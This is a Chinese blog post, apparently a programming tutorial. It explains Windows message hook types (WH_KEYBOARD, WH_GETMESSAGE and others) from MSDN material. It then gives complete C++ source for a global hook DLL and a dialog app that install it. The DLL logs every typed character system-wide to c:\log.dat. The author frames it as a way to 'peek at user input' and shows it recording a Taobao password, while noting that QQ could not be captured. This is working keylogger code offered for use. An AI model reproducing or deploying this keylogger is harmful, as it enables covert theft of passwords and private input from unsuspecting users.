HOOK编程之初

钩子类型

每一种类型的Hook可以使应用程序能够监视不同类型的系统消息处理机制。下面描述所有可以利用的Hook类型。


1、WH_CALLWNDPROC和WH_CALLWNDPROCRET 
      WH_CALLWNDPROC和WH_CALLWNDPROCRET Hooks使你可以监视发送到窗口过程的消息。

      系统在消息发送到接收窗口过程之前调用WH_CALLWNDPROC Hook子程,并且在窗口过程处理完消息之后调用WH_CALLWNDPROCRET Hook子程。
WH_CALLWNDPROCRET Hook传递指针到CWPRETSTRUCT结构,再传递到Hook子程。
CWPRETSTRUCT结构包含了来自处理消息的窗口过程的返回值,同样也包括了与这个消息关联的消息参数。


2、WH_CBT
在以下事件之前,系统都会调用WH_CBT Hook子程,这些事件包括:
1. 激活,建立,销毁,最小化,最大化,移动,改变尺寸等窗口事件;
2. 完成系统指令;
3. 来自系统消息队列中的移动鼠标,键盘事件;
4. 设置输入焦点事件;
5. 同步系统消息队列事件。
Hook子程的返回值确定系统是否允许或者防止这些操作中的一个。


3、WH_DEBUG
在系统调用系统中与其他Hook关联的Hook子程之前,系统会调用WH_DEBUG Hook子程。你可以使用这个Hook来决定是否允许系统调用与其他Hook关联的Hook子程。


4、WH_FOREGROUNDIDLE
当应用程序的前台线程处于空闲状态时,可以使用WH_FOREGROUNDIDLE Hook执行低优先级的任务。当应用程序的前台线程大概要变成空闲状态时,系统就会调用WH_FOREGROUNDIDLE Hook子程。


5、WH_GETMESSAGE
应用程序使用WH_GETMESSAGE Hook来监视从GetMessage or PeekMessage函数返回的消息。你可以使用WH_GETMESSAGE Hook去监视鼠标和键盘输入,以及其他发送到消息队列中的消息。



6、WH_JOURNALPLAYBACK
WH_JOURNALPLAYBACK Hook使应用程序可以插入消息到系统消息队列。可以使用这个Hook回放通过使用WH_JOURNALRECORD Hook记录下来的连续的鼠标和键盘事件。只要WH_JOURNALPLAYBACK Hook已经安装,正常的鼠标和键盘事件就是无效的。
WH_JOURNALPLAYBACK Hook是全局Hook,它不能象线程特定Hook一样使用。
WH_JOURNALPLAYBACK Hook返回超时值,这个值告诉系统在处理来自回放Hook当前消息之前需要等待多长时间(毫秒)。这就使Hook可以控制实时事件的回放。
WH_JOURNALPLAYBACK是system-wide local hooks,它們不會被注射到任何行程位址空間。



7、WH_JOURNALRECORD
WH_JOURNALRECORD Hook用来监视和记录输入事件。典型的,可以使用这个Hook记录连续的鼠标和键盘事件,然后通过使用WH_JOURNALPLAYBACK Hook来回放。
WH_JOURNALRECORD Hook是全局Hook,它不能象线程特定Hook一样使用。
WH_JOURNALRECORD是system-wide local hooks,它們不會被注射到任何行程位址空間。


8、WH_KEYBOARD
在应用程序中,WH_KEYBOARD Hook用来监视WM_KEYDOWN and WM_KEYUP消息,这些消息通过GetMessage or PeekMessage function返回。可以使用这个Hook来监视输入到消息队列中的键盘消息。


9、WH_KEYBOARD_LL
WH_KEYBOARD_LL Hook监视输入到线程消息队列中的键盘消息。


10、WH_MOUSE
WH_MOUSE Hook监视从GetMessage 或者 PeekMessage 函数返回的鼠标消息。使用这个Hook监视输入到消息队列中的鼠标消息。


11、WH_MOUSE_LL
WH_MOUSE_LL Hook监视输入到线程消息队列中的鼠标消息。


12、WH_MSGFILTER 和 WH_SYSMSGFILTER
WH_MSGFILTER 和 WH_SYSMSGFILTER Hooks使我们可以监视菜单,滚动条,消息框,对话框消息并且发现用户使用ALT+TAB or ALT+ESC 组合键切换窗口。WH_MSGFILTER Hook只能监视传递到菜单,滚动条,消息框的消息,以及传递到通过安装了Hook子程的应用程序建立的对话框的消息。WH_SYSMSGFILTER Hook监视所有应用程序消息。
WH_MSGFILTER 和 WH_SYSMSGFILTER Hooks使我们可以在模式循环期间过滤消息,这等价于在主消息循环中过滤消息。
通过调用CallMsgFilter function可以直接的调用WH_MSGFILTER Hook。通过使用这个函数,应用程序能够在模式循环期间使用相同的代码去过滤消息,如同在主消息循环里一样。


基本概念
13、WH_SHELL
外壳应用程序可以使用WH_SHELL Hook去接收重要的通知。当外壳应用程序是激活的并且当顶层窗口建立或者销毁时,系统调用WH_SHELL Hook子程。


WH_SHELL 共有5钟情況:
1. 只要有个top-level、unowned 窗口被产生、起作用、或是被摧毁;
2. 当Taskbar需要重画某个按钮;
3. 当系统需要显示关于Taskbar的一个程序的最小化形式;
4. 当目前的键盘布局状态改变;
5. 当使用者按Ctrl+Esc去执行Task Manager(或相同级别的程序)。
按照惯例,外壳应用程序都不接收WH_SHELL消息。所以,在应用程序能够接收WH_SHELL消息之前,应用程序必须调用SystemParametersInfo function注册它自己。


在微软的MSDN(Microsoft Developper Network,微软开发者网络)中,对钩子(Hooks)有非常详细的介绍。这里是部分内容的译文,原文省略。


          钩子(Hook)是Windows消息处理机制的一个要点(Point)。应用程序可以安装钩子处理程序去监视Window消息传输并可以在一些消息传递到目标窗口之前处理这些消息。


          Windows系统支持许多不同类型的钩子;每种钩子提供处理不同方面的消息处理机制,如可以用WH_MOUSE鼠标钩子来监视鼠标消息的传递。


          Windows系统实际支持如下13种类型的钩子,对“证券大盗”病毒而言,我们关心的是键盘消息“钩子”(WH_KEYBOARD Hook):

WH_CALLWNDPROC :系统将消息发送到指定窗口之前的“钩子”
WH_CALLWNDPROCRET Hooks :消息已经在窗口中处理的“钩子” 
WH_CBT Hook :基于计算机培训的“钩子”
WH_DEBUG Hook :差错“钩子”
WH_FOREGROUNDIDLE Hook :前台空闲窗口“钩子”
WH_GETMESSAGE Hook :接收消息投递的“钩子”
WH_JOURNALPLAYBACK Hook :回放以前通过WH_JOURNALRECORD“钩子”记录的输入消息
WH_JOURNALRECORD Hook :输入消息记录“钩子”
WH_KEYBOARD Hook :键盘消息“钩子”
WH_MOUSE Hook :鼠标消息“钩子”
WH_MSGFILTER :对话框、消息框、菜单或滚动条输入消息“钩子”
WH_SYSMSGFILTER Hooks :系统消息“钩子”
WH_SHELL Hook :外壳“钩子”





获取用户消息


我们可以额外的在此基础上添加获得键盘输入字符,并且写入文件,以此来“偷窥用户的输入”....

多的不说了,只需要在代码后加上
    SetWindowsHookEx(WH_GETMESSAGE,GetMsgProc,GetModuleHandle("Hook"),0);

    Hook动态库的详细代码:hook.cpp

点击(此处)折叠或打开

  1. #include <windows.h>
  2. #include <stdio.h>

  3. HHOOK g_hMouse=NULL;
  4. HHOOK g_hKeyboard=NULL;
  5. HHOOK g_hMessage=NULL;

  6. #pragma data_seg("MySec")
  7. HWND g_hWnd=NULL;
  8. #pragma data_seg()

  9. //#pragma comment(linker,"/section:MySec,RWS")
  10. /*HINSTANCE g_hInst;

  11. BOOL WINAPI DllMain(
  12.   HINSTANCE hinstDLL, // handle to the DLL module
  13.   DWORD fdwReason, // reason for calling function
  14.   LPVOID lpvReserved // reserved
  15. )
  16. {
  17.     g_hInst=hinstDLL;
  18. }*/

  19. LRESULT CALLBACK MouseProc(
  20.   int nCode, // hook code
  21.   WPARAM wParam, // message identifier
  22.   LPARAM lParam // mouse coordinates
  23. )
  24. {
  25.     UnhookWindowsHookEx(g_hMouse);    ///< 这样“钩子”就失效了
  26.     return 1;
  27. }

  28. LRESULT CALLBACK KeyboardProc(
  29.   int nCode, // hook code
  30.   WPARAM wParam, // virtual-key code
  31.   LPARAM lParam // keystroke-message information
  32. )
  33. {
  34.     //UnhookWindowsHookEx(g_hKeyboard);    ///< 这样“钩子”就失效了
  35.     if(VK_F2==wParam)
  36.     {
  37.         SendMessage(g_hWnd,WM_CLOSE,0,0);
  38.         UnhookWindowsHookEx(g_hMouse);
  39.         UnhookWindowsHookEx(g_hKeyboard);
  40.     }
  41.     return 0;
  42. }

  43. LRESULT CALLBACK GetMsgProc(
  44.     int nCode, // hook code
  45.     WPARAM wParam, // virtual-key code
  46.     LPARAM lParam // keystroke-message information
  47.  )
  48. {
  49.     if(nCode == HC_ACTION) 
  50.     { 
  51.         MSG * pMsg = (MSG *) lParam; 
  52.         if (pMsg->message == WM_CHAR)
  53.         {
  54.             //MessageBox(NULL,"ok","HOOKDLL",MB_OK);
  55.             char ch = (char)pMsg->wParam;
  56.             char pCh[2] = {0};
  57.             pCh[0] = ch;
  58.             pCh[1] = '\0';
  59.             
  60.             FILE * pFile = fopen("c:\\log.dat", "a+");
  61.             fwrite(pCh, 1, strlen(pCh), pFile);
  62.             fclose(pFile);
  63.         }
  64.     }
  65.     return CallNextHookEx(g_hMessage, nCode, wParam, lParam); 
  66. }

  67. void SetHook(HWND hwnd)
  68. {
  69.     g_hWnd=hwnd;
  70.     g_hMouse=SetWindowsHookEx(WH_MOUSE,MouseProc,GetModuleHandle("Hook"),0);
  71.     g_hKeyboard=SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,GetModuleHandle("Hook"),0);
  72.     g_hMessage=SetWindowsHookEx(WH_GETMESSAGE,GetMsgProc,GetModuleHandle("Hook"),0);
  73. }
     Hook动态库的 详细代码:hook.def

点击(此处)折叠或打开

  1. LIBRARY Hook
  2. EXPORTS
  3. SetHook        @2
  4. SEGMENTS
  5. MySec    READ WRITE SHARED
    编译一下,生成.dll和.lib,至于区别,资料看起!

    新建一个对话框工程,设置链接路径,.lib的,然后拷贝上面生成的hook.dll到当前工程目录,(OnInitDialog中)引用方式:
    /
   // CHookTestDlg message handlers
  _declspec(dllimport) void SetHook(HWND hwnd);

    然后一调:

点击(此处)折叠或打开

  1. BOOL CHookTestDlg::OnInitDialog()
  2. {
  3.     CDialog::OnInitDialog();

  4.     // Add "About..." menu item to system menu.

  5.     // IDM_ABOUTBOX must be in the system command range.
  6.     ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
  7.     ASSERT(IDM_ABOUTBOX < 0xF000);

  8.     CMenu* pSysMenu = GetSystemMenu(FALSE);
  9.     if (pSysMenu != NULL)
  10.     {
  11.         CString strAboutMenu;
  12.         strAboutMenu.LoadString(IDS_ABOUTBOX);
  13.         if (!strAboutMenu.IsEmpty())
  14.         {
  15.             pSysMenu->AppendMenu(MF_SEPARATOR);
  16.             pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
  17.         }
  18.     }

  19.     // Set the icon for this dialog. The framework does this automatically
  20.     // when the application's main window is not a dialog
  21.     SetIcon(m_hIcon, TRUE);            // Set big icon
  22.     SetIcon(m_hIcon, FALSE);        // Set small icon
  23.     
  24.     // TODO: Add extra initialization here
  25.     int cxScreen,cyScreen;
  26.     cxScreen=GetSystemMetrics(SM_CXSCREEN);
  27.     cyScreen=GetSystemMetrics(SM_CYSCREEN);
  28.     SetWindowPos(&wndTopMost,0,0,cxScreen/2,cyScreen/2,SWP_SHOWWINDOW);
  29.     SetHook(m_hWnd);
  30.     return TRUE; // return TRUE unless you set the focus to a control
  31. }
    允许,然后去淘宝网站输入你的密码,你的键盘字符就被存了起来了! 
    但是对于qq输入框,无法获得其键盘消息!应该是qq自身截获了WM_CHAR消息或者啥的!所以本来想测试下qq,但是不行!
   或许有其他办法???不知道了.......【估计还有高深的背后...】


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值